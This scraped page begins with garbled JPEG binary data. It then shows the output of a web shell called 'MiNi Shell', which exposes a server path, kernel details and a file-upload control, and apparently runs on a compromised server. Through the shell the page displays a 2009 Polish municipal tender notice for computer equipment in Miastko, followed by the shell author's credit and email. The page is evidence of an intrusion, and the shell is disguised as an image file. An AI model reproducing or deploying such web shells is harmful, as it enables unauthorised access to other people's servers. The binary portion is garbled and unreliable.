JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090507/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090507/137884-N-2009.html

<p class="kh_header"><b>Miastko: Dostawa elektronicznego sprzętu biurowego dla Urzędu Miejskiego w Miastku, gm. Miastko, pow. bytowski, woj. pomorskie</b><br>
<b>Numer ogłoszenia: 137884 - 2009; data zamieszczenia: 07.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miastko , ul. Grunwaldzka 1, 77-200 Miastko, woj. pomorskie, tel. 059 8572081, faks 059 8572368.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miastko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa elektronicznego sprzętu biurowego dla Urzędu Miejskiego w Miastku, gm. Miastko, pow. bytowski, woj. pomorskie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa następującego sprzętu komputerowego  dla Urzędu Miejskiego w Miastku:
1) komputery PC - 8 szt.
2) monitory LCD - 19 szt.
3) drukarki  - 8 szt.
4) Serwer - 1 szt.
5) Zasilacze UPS  - 2 szt.
6) Projektor  multimedialny  - 1 szt.
Szczegółowy opis przedmiotów zamówienia przedstawiono w poz.3.0 SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.00.00.00-9, 30.23.12.50-4, 30.23.13.00-0, 30.23.32.31-9, 30.24.10.00-0, 30.23.72.80-5, 30.26.10.00-6, 38.65.21.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Działając w oparciu o art.45 ustawy Pzp Zamawiający odstępuje od wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 2.1 )posiadają uprawnienia do wykonywania działalności gospodarczej w zakresie upoważniającym  wykonawcę do ubiegania się o udzielenie i  realizację zamówienia będącego przedmiotem  niniejszego postępowania;
2.2) posiadają niezbędną wiedzę i doświadczenie do wykonania zamówienia - wymagania  minimalne: udokumentowanie wykonania w okresie ostatnich trzech lat, przed dniem wszczęcia postępowania o udzielenie zamówienia a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonali ( zakończyli ) jako wykonawca lub podwykonawca co najmniej jedną  dostawę odpowiadająca swym rodzajem i wartością niniejszemu zamówieniu o wartości nie mniejszej niż 20 000,00 PLN (netto);
2.3) dysponują niezbędnym potencjałem technicznym  do wykonania zamówienia lub przedstawią  pisemne zobowiązanie innych podmiotów do jego udostępnienia 2.4) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj. posiadają dostęp lub dysponują środkami finansowymi  w kwocie  nie mniejszej niż 40.000,00 PLN; 
2.5) nie podlegają wykluczeniu z ubiegania się o zamówienie publiczne na podstawie art. 24  ust. 1i 2 ustawy  Pzp.; 
2.6) zgodnie z art. 44 ustawy Pzp. Złożą oświadczenie o spełnianiu warunków udziału  w postępowaniu i dokumenty potwierdzające spełnianie tych warunków.
2.7)Spełnianie warunków Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia stosownie do art.23 u.Pzp ( np. na podstawie umowy konsorcjalnej ) warunki zawarte w części 7.0 SIWZ muszą spełniać w sposób następujący:
2.7.1) wymienione w pozycji 7.1.1, 7.1.2 , 7.1.3 , 7.1.4 , 7.1.5 SIWZ musza być spełnione łącznie;
2.7.2) wymienione w pozycji 7.1.6 SIWZ muszą być spełnione przez każdego z wykonawców   oddzielnie.
2.8) Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:
2.8.1) ocena spełniania przez Wykonawców w/w wymaganych warunków będzie dokonana zgodnie z formułą -spełnia/nie spełnia- w oparciu o informacje zawarte w dokumentach lub oświadczeniach wyszczególnionych w części 8.0. siwz i załączonych do oferty.
Z treści tych dokumentów lub oświadczeń musi jednoznacznie
wynikać, że w/w warunki Wykonawca spełnia;
2.8.2) na podstawie art. 26 ust. 3 Pzp Zamawiający wezwie Wykonawców, którzy w określonym terminie  nie złożyli wymaganych dokumentów lub oświadczeń (lub złożone zawierają błędy), o których mowa w  części 8.0. siwz lub nie złożyli pełnomocnictw (lub złożone są wadliwe) do ich złożenia w wyznaczonym terminie;
2.8.3) nie spełnienie chociażby jednego z w/w warunków oraz brak uzupełnienia dokumentów lub oświadczeń zgodnie z wezwaniem Zamawiającego spowoduje wykluczenie Wykonawcy z postępowania, a jego oferta zostanie uznana za odrzuconą;
2.8.4) Zamawiający  dokona wyboru najkorzystniejszej oferty spośród  ofert ważnych i nie  podlegających odrzuceniu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 3.1) aktualny odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności  gospodarczej, w zakresie objętym zamówieniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
3.2) wykaz wykonanych zamówień  - dostaw wykonanych w okresie ostatnich trzech lat, a jeżeli okres  prowadzenia działalności jest krótszy to w tym okresie zawierający nie mniej niż  jedno zamówienie  publiczne dotyczące dostaw takich samych jak przedmiot niniejszego  zamówienia   o wartości   nie mniejszej niż 20 000,00 PLN (netto  ). Zaleca się sporządzenie wykazu zgodnie  załącznikiem nr 2 SIWZ (druk do wypełnienia lub wzorowania się,)
3.3) dokumenty potwierdzające  należyte wykonanie dostaw  zamieszczonych w wykazie wymienionym w poz. 8.1.2 siwz wystawione przez  Zamawiających, u których wymienione dostawy zostały wykonane, za które można przyjąć: referencje, rekomendacje, listy polecające oraz inne dokumenty, z których treści jasno wynika, iż zamieszczone w wykazie dostawy zrealizowano należycie;
Uwaga: Z załączonych dokumentów potwierdzających należyte wykonanie, musi jednoznacznie wynikać, że odnoszą się do dostaw  wyszczególnionych w wykazie. Brak udokumentowania należytego wykonania wymienionych w wykazie dostaw skutkować będzie nie spełnieniem warunku, a w konsekwencji wykluczeniem wykonawcy  i odrzuceniem jego oferty;  
3.4) oświadczenie Wykonawcy, że  nie podlega wykluczeniu  z  postępowania stosownie do treści art. 24 ust.1  ust.2  u.Pzp. - zaleca się sporządzenie zgodnie z załącznikiem nr 3 SIWZ (druk do wypełnienia lub wzorowania się),
3.5) oświadczenie Wykonawcy stosownie do art. 44 u.Pzp. o spełnianiu warunków   udziału w postępowaniu określone w art.22 ust.1 ustawy  Pzp. - zaleca się sporządzenie zgodnie z załącznikiem nr 4 SIWZ (druk do wypełnienia lub wzorowania się),
3.6) pełnomocnictwo osoby uprawnionej do reprezentowania firmy, zgodnie z forma reprezentacji Wykonawcy określoną w rejestrze handlowym lub w innym dokumencie, właściwym dla formy organizacyjnej firmy Wykonawcy o ile nie wynika  to z innych dokumentów załączonych do oferty:
3.7) dokument, w którym wykonawcy wspólnie ubiegający się o udzielenie zamówienia  ( np. na podstawie umowy konsorcjalnej, działalności prowadzonej w formie spółki cywilnej ) ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo   reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, z którego wynika, że zostało ono udzielone przez każdego z Nich ( podpisany przez wszystkich wykonawców ) - w formie oryginału..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.miastko.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Miastku, 77 - 200 Miastko, ul. Grunwaldzka 1, pok. Nr 25..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.05.2009 godzina 12:00, miejsce: Urząd Miejski w Miastku, 77 - 200 Miastko, ul. Grunwaldzka 1, pok. Nr 19 ( sekretariat burmistrza ). Otwarcie w tut. Urzędzie o godz. 12:15 w pok. nr 6.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa sprzętu komputerowego..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Komputer klasy PC -   8  szt.
Monitor LCD   - 19 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.00.00.00-9, 30.23.12.50-4, 30.23.13.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa drukarek.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Monochromatyczna drukarka laserowa o minimalnych wymaganiach - 8  szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.00.00.00-9, 30.23.32.31-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa serwera.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość szt - 1.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.00.00.00-9, 30.26.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa zasilaczy UPS.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość - szt. 2.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.00.00.00-9, 30.23.72.80-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa projektora multimedialnego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość - szt.1.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.00.00.00-9, 38.65.21.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com